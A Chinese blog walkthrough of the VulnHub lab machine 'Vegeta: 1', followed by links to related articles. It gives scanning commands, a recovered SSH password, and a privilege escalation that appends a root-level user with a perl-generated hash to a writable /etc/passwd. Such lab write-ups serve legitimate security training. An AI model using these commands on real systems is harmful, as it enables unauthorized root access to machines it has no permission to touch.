vulnhub Vegeta: 1

最新推荐文章于 2024-01-02 00:40:45 发布
原创 最新推荐文章于 2024-01-02 00:40:45 发布 · 722 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#gobuster #摩斯电码 #passwd #perl #crypt

本文详细记录了一次渗透攻击的过程,包括nmap扫描、网站目录发现、摩斯电码解码、SSH密码获取,以及利用新用户提权。展示了黑客如何一步步通过技术手段获取系统权限。

渗透思路:

nmap扫描----gobuster扫描网站目录----在线解码摩斯电码,得到ssh用户名密码----/etc/passwd写入用户提权

环境信息:

靶机:192.168.101.77

攻击机:192.168.101.34

具体步骤:

1、nmap扫描

sudo nmap -sV -sC -p- 192.168.101.77

2、dirb扫描网站目录(兔子洞)

​dirb http://192.168.101.77

发现http://192.168.101.77/robots.txt

(下面是一个兔子洞)

浏览器访问http://192.168.101.77/robots.txt,发现/find_me

浏览器访问/find_me,点击find_me.html,并查看网页源代码

view-source:http://192.168.101.77/find_me/find_me.html

拉到最下面发现一大段注释(没啥用就不复制粘贴了)

base64解码之后还是一堆没有意义的乱码,此路不通

3、gobuster扫描网站目录

​gobuster dir -u http://192.168.101.77/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

扫描到/bulma

http://192.168.101.77/bulma/是个目录,里面有个文件hahahaha.wav

下载下来听了一下,感觉是摩斯电码

4、在线解码摩斯电码,得到ssh用户名密码

找了个在线翻译器:Morse Code Audio Decoder | Morse Code World

按upload上传hahahaha.wav,然后按play,自动转为文本信息

得到的结果是

USES: TRUNKS PASSWORD : US3R(S IN DOLLPS SYMBOL)

以用户名trunks,密码u$3r进行ssh登录

ssh trunks@192.168.101.77

5、/etc/passwd写入新用户提权

查看/home/trunks/.bash_history,发现其中有向/etc/passwd写入新用户的操作

查看/etc/passwd的文件权限

ls -al /etc/passwd

发现trunks用户有写权限

参考/home/trunks/.bash_history中的命令,先用perl生成加密的用户密码

perl -le 'print crypt("123456","addedsalt")'

以上命令中,用户的明文密码为123456

然后再将新用户test写入/etc/passwd

echo "test:adrla7IBSfTZQ:0:0:root:/root:/bin/bash" >> /etc/passwd

最后切换到test用户,输入密码123456,获得root权限,并在/root目录下找到root.txt

su - test

一次新奇的内网渗透靶场——vegeta
qq_63217130的博客
07-04 326
带莫斯密码的内网靶场——vegeta
靶机13 VEGETA: 1
honest_gg的博客
10-09 2914
这是一个完整的初学者的机器,获取标志
vulnhubvegeta
weixin_54431413的博客
07-07 759
首先拿到一串base64加密数据,进行解密,是二维码,提取出一个密码,但是这是迷惑我们的。在bulma下,拿到摩斯密码音频,进行分析,得到账号密码,突破边界。/etc/passwd权限过大,直接创建root。...
Vulnhub靶机VEGETA_ 1
LainWith的博客
10-05 1322
Vegeta(此系列共1台)发布日期:2020年6月28日难度:低目标:取得 root 权限 + Flag主机发现端口扫描信息收集路径枚举摩尔斯码数据编码还原二维码解码本地提权。
OSCP系列靶场-Esay-Vegeta1保姆级
杳若的博客
09-13 1228
OSCP系列靶场-Esay-Vegeta1保姆级
vulnhub靶场vegeta 详解喔
最新发布
m0_73255659的博客
01-02 1156
vegeta 靶机
vegeta:HTTP负载测试工具和库。 超过9000!
02-02
您可以在Mac OS X上使用软件包管理器安装Vegeta: $ brew update && brew install vegeta 资源 你需要go安装和GOBIN在你的PATH 。 完成后,运行命令: $ go get -u github.com/tsenart/vegeta 版本控制 库和CLI均...
vegeta:包装器脚本和Dockerfile,用于在集线器上自动化vegeta docker映像
05-19
该脚本允许将一些vegeta参数设置为环境变量,同时提供一些没有它们的合理默认值。 接下来,我们只是提供一个Dockerfile实现自动化码头工人形象建设上正式 luser@lolcathost: ~ $ docker pull perfci/vegeta luser@...
docker-vegeta:强调您的架构从无数 docker 容器中进行 HTTP 负载测试
07-06
root@cb6740a3f8b7:/go# echo "GET https://example.com/" | vegeta attack -duration=3s -rate=5 -timeout=1m | tee results.bin | vegeta report Requests [total] 15 Duration [total, attack, wait] 2....
Vegeta:HTTP负载测试工具和库。 超过9000!-开源
04-25
您可以在Mac OS X上使用Homebrew软件包管理器安装Vegeta。库和CLI均使用SemVer v2.0.0进行版本控制。 在v8.0.0之后,将分别对这两个组件进行版本控制,以更好地隔离每个组件的重大更改。 CLI版本使用cli / vMAJOR....
Vegeta:高效率HTTP负载测试工具及版本控制介绍
Vegeta既可以作为命令行工具使用,也可以作为库嵌入到其他项目中。该工具适用于开发者和运维人员在开发、测试和部署环境中对HTTP服务进行性能评估和压力测试。 安装方法: Vegeta提供预编译的可执行文件,用户可以...
Vegeta靶机打靶过程及思路
qq_52610024的博客
07-21 380
7.发现/etc/passwd目录下可以写,写入一个管理员账号,成功拿到root权限,打靶完成。3.使用zbarimg工具进行读取但是没有得到任何有效信息,解码得到的文字并不是登录密码。4.再次使用超大型字典进行扫描,发现bulma这个极为隐蔽的目录,音频是一段摩尔电码。2.发现只有80端口可以突破,于是进行大字典的扫描,得到某个目录下存在一张图片。5.对该摩尔电码进行解码,得到用户名和密码。6.ssh登录成功突破,打点完成。1.常规端口扫描及发现。......
Vegeta靶机总结
qq_45301512的博客
12-24 610
修改vegeta靶机的网络连接模式为NAT,然后发现使用nmap扫描,没有发现ip,然后百度修改了vegeta虚拟机,获得了ip百度的帖子: https://www.cnblogs.com/asstart/p/12626494.html再次使用nmap扫描网段,获得了ip,并且根据80端口打开了网站继续目录扫描根据获得的信息,依次去打开网站查看http://192.168.11.135/admin 下面只有个admin.php,并且打开什么也没有。
2012-04-10日常记录
weixin_30677073的博客
04-10 123
任何一个小问题,发现问题,解决问题。 开会前发文档,表明会议议题,所有与会人员前10分钟到,略会议议题,避免会议期间不明白之处,减少瞎扯淡的时间。 建议系统的每个界面都需要帮助文档,减轻大用户软件的服务成本。 要严格控制进入数据库的每个字段大小,任何外来系统的数据进入系统前都要进行严格的数据规则筛选。 转载于:https://www.cnblogs.com/gaolijun1986/arch...
Linux Network Namespace
风格色的博客
06-28 511
创建两个network namespace并互相连接 1. 创建Veth pair 先创建两个netns(test1和test2) sudo ip netns add test1 sudo ip netns add test2 什么是veth pair Veth pair 是一对虚拟网卡,从一张veth网卡发出的数据包可以直接到达它的peer veth,两者之间存在着虚拟链路。 s...
zipkin
_trymybest的博客
01-18 153
http://zipkin.io/pages/quickstart load test: https://github.com/tsenart/vegeta https://github.com/avajs/ava#usage https://github.com/buger/goreplay
最中二的性能测试工具--vegeta
测试萌萌
03-01 1120
在github上翻到一个项目,名字叫vegeta,看到这个单词,你的第一反应是什么? 说来惭愧,我的第一反应是这个单词很奇怪,并不认识。 直到我往下翻,看到了这样一幅场景。
linux下 修改/etc/passwd文件添加用户要点,linux下添加删除,修改,查看用户和用户组...
weixin_42405368的博客
05-01 3470
一、组操作1、创建组:groupadd test #增加一个test组2、修改组groupmod -n test2 test #将test组的名子改成test23、删除组groupdel test2 #删除 组test24、查看组a),查看当前登录用户所在的组groups,查看apacheuser所在组groups apacheuserb),查看所有组cat /etc/groupc...
llinux 写/etc/passwd文件添加用户
qq_41631806的博客
04-07 5552
llinux 写/etc/passwd文件添加用户(openssl passd加密) 前言 在做vulnhub靶机——AI-web-1 .0的时候,getshell用户具有/etc/passwd写权限,/etc/shadow无读写权限。傻子将/etc/passwd密码直接以明文写进去,不能登录。 前提操作用户对文件/etc/passwd有写权限。 一、简单介绍/etc/passwd文件格式: 详细...
Vegeta: 多功能HTTP负载测试工具深入解析
1. **命令行工具**:Vegeta提供命令行接口,方便快速执行测试。 2. **库的形式**:同时提供库的形式,便于开发者在项目中集成负载测试功能。 3. **恒定请求速率**:能够生成恒定速率的请求,模拟真实用户行为。 4. *...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值